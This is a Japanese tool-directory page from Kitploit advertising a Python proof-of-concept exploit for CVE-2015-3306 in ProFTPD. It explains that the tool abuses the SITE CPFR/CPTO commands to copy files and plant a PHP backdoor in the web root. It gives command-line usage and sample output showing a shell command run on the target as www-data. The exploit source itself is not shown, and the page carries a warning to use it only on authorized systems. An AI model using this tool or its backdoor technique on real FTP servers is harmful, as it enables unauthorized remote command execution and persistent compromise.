Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2015-3306 | Kitploit
ツール/GitHubGitHub/donmedfor/cve-2015-3306
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubdonmedfor/cve-2015-3306

CVE-2015-3306

リポジトリを見る
0年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2015-3306 ProFTPD エクスプロイト

このリポジトリには、CVE-2015-3306 用の Python による Proof of Concept(PoC)エクスプロイトが含まれています。

⚠️ 警告: このツールは、自分が所有するシステム、または明示的なテスト許可を得たシステムに対してのみ使用してください。無断でのエクスプロイトは違法です。


著者

Mohamed EL-KHAROUATI


パート 1: CVE-2015-3306 ProFTPD エクスプロイト

説明

CVE-2015-3306 は、ProFTPD 1.3.5b 以前に存在するディレクトリトラバーサルの脆弱性です。このエクスプロイトを使用すると、任意のファイルをコピーし、Webルートに PHP バックドアを配置できます。このバックドアは、任意のシェルコマンドを実行できます。

特徴

  • SITE CPFR/CPTO FTP コマンドを介してディレクトリトラバーサルの脆弱性を悪用します。
  • 指定された Webルートに PHP バックドア(backdoor.php)を配置します。
  • バックドアを介して任意のシェルコマンドを実行します。
  • --rcommand によるカスタムコマンドをサポートします。

要件

  • Python 3.x
  • requests ライブラリ(pip install requests)

使用方法、出力、クリーンアップ(単一のコードブロック)

root@kitploit:~
# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>

# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami

# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip> 
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done
ツールをダウンロード